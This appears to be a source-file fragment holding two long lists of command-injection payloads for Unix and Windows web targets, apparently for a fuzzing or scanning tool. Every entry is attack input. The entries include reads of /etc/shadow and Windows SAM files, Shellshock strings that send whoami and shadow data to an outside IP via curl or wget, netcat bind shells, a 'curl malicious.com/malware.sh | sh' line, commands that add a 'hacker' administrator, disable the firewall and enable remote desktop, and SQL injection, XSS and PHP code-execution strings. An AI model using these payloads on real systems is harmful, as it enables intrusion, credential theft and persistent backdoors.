__payloadunix__ = [
'&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;',
'&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;',
'&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;',
'&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;',
'/index.html|id|',
';id;',
';id',
';netstat -a;',
';system("cat%20/etc/passwd")',
';id;',
'|id',
'|/usr/bin/id',
'|id|',
'|/usr/bin/id|',
'||/usr/bin/id|',
'|id;',
'||/usr/bin/id;',
';id|',
';|/usr/bin/id|',
'/bin/ls -al',
'/usr/bin/id',
'id',
'/usr/bin/id;',
'id;',
'/usr/bin/id|',
'id|',
';/usr/bin/id',
';id',
'|usr/bin/id',
'|nid',
'`id`',
'`/usr/bin/id`',
'a);id',
'a;id',
'a);id;',
'a;id;',
'a);id|',
'a;id|',
'a)|id',
"; ls",
"; cat /etc/passwd",
"; uname -a",
"; whoami",
"; ping -c 4 127.0.0.1",
"' OR '1'='1",
"'; DROP TABLE users; --",
"/<script>alert('XSS')</script>",
"; curl http://malicious.com/malware.sh | sh",
"; nc -e /bin/sh attacker_ip attacker_port"
'a|id',
'a)|id;',
'a|id',
'|/bin/ls -al',
'a);/usr/bin/id',
'a;/usr/bin/id',
'a);/usr/bin/id;',
'a;/usr/bin/id;',
'a);/usr/bin/id|',
'a;/usr/bin/id|',
'a)|/usr/bin/id',
'a|/usr/bin/id',
'a)|/usr/bin/id;',
'a|/usr/bin/id',
';system("cat%20/etc/passwd")',
';system("id")',
';system("/usr/bin/id")',
'%0Acat%20/etc/passwd',
'%0A/usr/bin/id',
'%0Aid',
'%0A/usr/bin/id%0A',
'%0Aid%0A',
'& ping -i 30 127.0.0.1 &',
'& ping -n 30 127.0.0.1 &',
'%0a ping -i 30 127.0.0.1 %0a',
'`ping 127.0.0.1`',
'| id',
'& id',
'; id',
'%0a id %0a',
'`id`',
'$;/usr/bin/id',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"',
'() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"',
'() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"',
'() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"',
'() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"',
'() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"',
'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"',
'() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"',
'() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"',
'() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"',
'cat /etc/hosts',
'$(`cat /etc/passwd`)',
'cat /etc/passwd',
'%0Acat%20/etc/passwd',
'{{ get_user_file("/etc/passwd") }}',
'<!--#exec cmd="/bin/cat /etc/passwd"-->',
'<!--#exec cmd="/bin/cat /etc/shadow"-->',
'<!--#exec cmd="/usr/bin/id;-->',
'system("cat /etc/passwd");',
'<?php system("cat /etc/passwd");?>'
]




__payloadWin__ =[
'|| ',
'| ',
'; ',
'"',
'& ',
'&& ',
'%0Aid',
'%0A/usr/bin/id',
'%0A/usr/bin/id%0A',
'%2 -n 21 127.0.0.1||"ping -c 21 127.0.0.1 # |ping -n 21 127.0.0.1|| ping -c 21 127.0.0.1"',
'%20{${phpinfo()}}',
'%20{${sleep(20)}}',
'%20{${sleep(3)}}',
'a|id|',
'a;id|',
'a;id;',
'a;id',
'() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12',
'| curl http://crowdshield.com/.testing/rce.txt',
'& curl http://crowdshield.com/.testing/rce.txt',
'; curl https://crowdshield.com/.testing/rce_vuln.txt',
'&& curl https://crowdshield.com/.testing/rce_vuln.txt',
'curl https://crowdshield.com/.testing/rce_vuln.txt',
' curl https://crowdshield.com/.testing/rce_vuln.txt',
'curl https://crowdshield.com/.testing/rce_vuln.txt',
'$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)',
'dir',
'| dir',
'; dir',
'$(`dir`)',
'& dir',
'&&dir',
'&& dir',
'"; dir C:\"',
'"& dir C:\"',
'"&& dir C:\"',
'"dir C:\"',
'| dir C:\Documents and Settings\*',
'; dir C:\Documents and Settings\*',
'& dir C:\Documents and Settings\*',
'&& dir C:\Documents and Settings\*',
'dir C:\Documents and Settings\*',
';echo%20"<script>alert(1)</script>"',
';echo "<script>alert(1)</script>"',
'() { :;}; echo vulnerable 10',
'eval("echo XXXXXXXXXXXXXXXXX")',
'exec("echo XXXXXXXXXXXXXXXXX")',
';{$_GET["cmd"]}',
'`id`',
'|id',
'| id',
';id',
';id|',
';id;',
'& id',
'&&id',
';id\n',
'ifconfig',
'| ifconfig',
'; ifconfig',
'& ifconfig',
'&& ifconfig',
'/index.html|id|',
'ipconfig',
'| ipconfig /all',
'; ipconfig /all',
'& ipconfig /all',
'&& ipconfig /all',
'ipconfig /all',
'ls',
'$(`ls`)',
'| ls -l /',
'; ls -l /',
'& ls -l /',
'&& ls -l /',
'ls -l /',
'| ls -laR /etc',
'; ls -laR /etc',
'& ls -laR /etc',
'&& ls -laR /etc',
'| ls -laR /var/www',
'; ls -laR /var/www',
'& ls -laR /var/www',
'&& ls -laR /var/www',
'| ls -l /etc/',
'; ls -l /etc/',
'& ls -l /etc/',
'&& ls -l /etc/',
'ls -l /etc/',
'ls -lh /etc/',
'| ls -l /home/*',
'; ls -l /home/*',
'& ls -l /home/*',
'&& ls -l /home/*',
'ls -l /home/*',
'*; ls -lhtR /var/www/',
'| ls -l /tmp',
'; ls -l /tmp',
'& ls -l /tmp',
'&& ls -l /tmp',
'ls -l /tmp',
'| ls -l /var/www/*',
'; ls -l /var/www/*',
'& ls -l /var/www/*',
'&& ls -l /var/www/*',
'ls -l /var/www/*',
'[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`',
'[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`',
'/bin/ls -al',
'| nc -lvvp 4444 -e /bin/sh|',
'; nc -lvvp 4444 -e /bin/sh;',
'& nc -lvvp 4444 -e /bin/sh&',
'&& nc -lvvp 4444 -e /bin/sh &',
'nc -lvvp 4444 -e /bin/sh',
'nc -lvvp 4445 -e /bin/sh &',
'nc -lvvp 4446 -e /bin/sh|',
'nc -lvvp 4447 -e /bin/sh;',
'nc -lvvp 4448 -e /bin/sh&',
'[2Acurl https://crowdshield.com/.testing/rce_vuln.txt',
'[2Asleep 5',
'echo INJECTX exit [2Awget https://crowdshield.com/.testing/rce_vuln.txt',
'| net localgroup Administrators hacker /ADD',
'; net localgroup Administrators hacker /ADD',
'& net localgroup Administrators hacker /ADD',
'&& net localgroup Administrators hacker /ADD',
'net localgroup Administrators hacker /ADD',
'| netsh firewall set opmode disable',
'; netsh firewall set opmode disable',
'& netsh firewall set opmode disable',
'&& netsh firewall set opmode disable',
'netsh firewall set opmode disable',
'netstat',
';netstat -a;',
'| netstat -an',
'; netstat -an',
'& netstat -an',
'&& netstat -an',
'netstat -an',
'| net user hacker Password1 /ADD',
'; net user hacker Password1 /ADD',
'& net user hacker Password1 /ADD',
'&& net user hacker Password1 /ADD',
'net user hacker Password1 /ADD',
'| net view',
'; net view',
'& net view',
'&& net view',
'net view',
'id|',
'id;',
'id',
'/usr/bin/id',
'|| phpinfo()',
'| phpinfo()',
' {${phpinfo()}}',
';phpinfo()',
';phpinfo();//',
';phpinfo();//',
'{${phpinfo()}}',
'& phpinfo()',
'&& phpinfo()',
'phpinfo()',
'phpinfo();',
'<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>',
'<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>',
'<?php system("echo XXXXXXXXXXXXXXXX");?>',
'<?php system("sleep 10");?>',
'<?php system("sleep 5");?>',
'<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>',
'<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>',
':phpversion();',
'`ping 127.0.0.1`',
'& ping -i 30 127.0.0.1 &',
'& ping -n 30 127.0.0.1 &',
';${@print(md5(RCEVulnerable))};',
'${@print("RCEVulnerable")}',
'pwd',
'| pwd',
'; pwd',
'& pwd',
'&& pwd',
'\r',
'| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
'; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
'& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
'&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
'\r\n',
'route',
'| sleep 1',
'; sleep 1',
'& sleep 1',
'&& sleep 1',
'sleep 1',
'|| sleep 10',
'| sleep 10',
'; sleep 10',
'{${sleep(10)}}',
'& sleep 10 ',
'&& sleep 10',
'sleep 10',
'|| sleep 15',
'| sleep 15',
'; sleep 15',
'& sleep 15 ',
'&& sleep 15',
' {${sleep(20)}}',
'{${sleep(20)}}',
' {${sleep(3)}}',
'{${sleep(3)}}',
'| sleep 5',
'; sleep 5',
'& sleep 5',
'&& sleep 5',
'sleep 5',
' {${sleep(hexdec(dechex(20)))}} ',
'{${sleep(hexdec(dechex(20)))}} ',
'sysinfo',
'| sysinfo',
'; sysinfo',
'& sysinfo',
'&& sysinfo',
'system("cat config.php");',
'|| system("curl https://crowdshield.com/.testing/rce_vuln.txt");',
'| system("curl https://crowdshield.com/.testing/rce_vuln.txt");',
'; system("curl https://crowdshield.com/.testing/rce_vuln.txt");',
'& system("curl https://crowdshield.com/.testing/rce_vuln.txt");',
'&& system("curl https://crowdshield.com/.testing/rce_vuln.txt");',
'system("curl https://crowdshield.com/.testing/rce_vuln.txt")',
'system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf")',
'system("curl https://xerosecurity.com/.testing/rce_vuln.txt");',
'system("echo XXXXXXXXXXXXXXX")',
'systeminfo',
'| systeminfo',
'; systeminfo',
'& systeminfo',
'&& systeminfo',
'system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23")',
'system("wget https://xerosecurity.com/.testing/rce_vuln.txt");',
'$(`type C:\boot.ini`)',
'&&type C:\\boot.ini',
'| type C:\Windows\epair\SAM',
'; type C:\Windows\epair\SAM',
'& type C:\Windows\epair\SAM',
'&& type C:\Windows\epair\SAM',
'type C:\Windows\epair\SAM',
'| type C:\Windows\epair\SYSTEM',
'; type C:\Windows\epair\SYSTEM',
'& type C:\Windows\epair\SYSTEM',
'&& type C:\Windows\epair\SYSTEM',
'type C:\Windows\epair\SYSTEM',
'| type C:\WINNT\epair\SAM',
'; type C:\WINNT\epair\SAM',
'& type C:\WINNT\epair\SAM',
'&& type C:\WINNT\epair\SAM',
'type C:\WINNT\epair\SAM',
'type C:\WINNT\epair\SYSTEM',
'| type %SYSTEMROOT%\epair\SAM',
'; type %SYSTEMROOT%\epair\SAM',
'& type %SYSTEMROOT%\epair\SAM',
'&& type %SYSTEMROOT%\epair\SAM',
'type %SYSTEMROOT%\epair\SAM',
'| type %SYSTEMROOT%\epair\SYSTEM',
'; type %SYSTEMROOT%\epair\SYSTEM',
'& type %SYSTEMROOT%\epair\SYSTEM',
'&& type %SYSTEMROOT%\epair\SYSTEM',
'type %SYSTEMROOT%\epair\SYSTEM',
'uname',
';uname;',
'| uname -a',
'; uname -a',
'& uname -a',
'&& uname -a',
'uname -a',
'|/usr/bin/id',
';|/usr/bin/id|',
';/usr/bin/id|',
'$;/usr/bin/id',
'() { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11',
'| wget http://crowdshield.com/.testing/rce.txt',
'& wget http://crowdshield.com/.testing/rce.txt',
'; wget https://crowdshield.com/.testing/rce_vuln.txt',
'$(`wget https://crowdshield.com/.testing/rce_vuln.txt`)',
'&& wget https://crowdshield.com/.testing/rce_vuln.txt',
'wget https://crowdshield.com/.testing/rce_vuln.txt',
'$(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)',
'which curl',
'which gcc',
'which nc',
'which netcat',
'which perl',
'which python',
'which wget',
'whoami',
'| whoami',
'; whoami',
'" whoami',
'" || whoami',
'" & whoami',
'" && whoami',
'"; whoami',
'" whoami',
'" || whoami',
'" | whoami',
'" & whoami',
'" && whoami',
'"; whoami',
'$(`whoami`)',
'& whoami',
'&& whoami',
'{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}',
]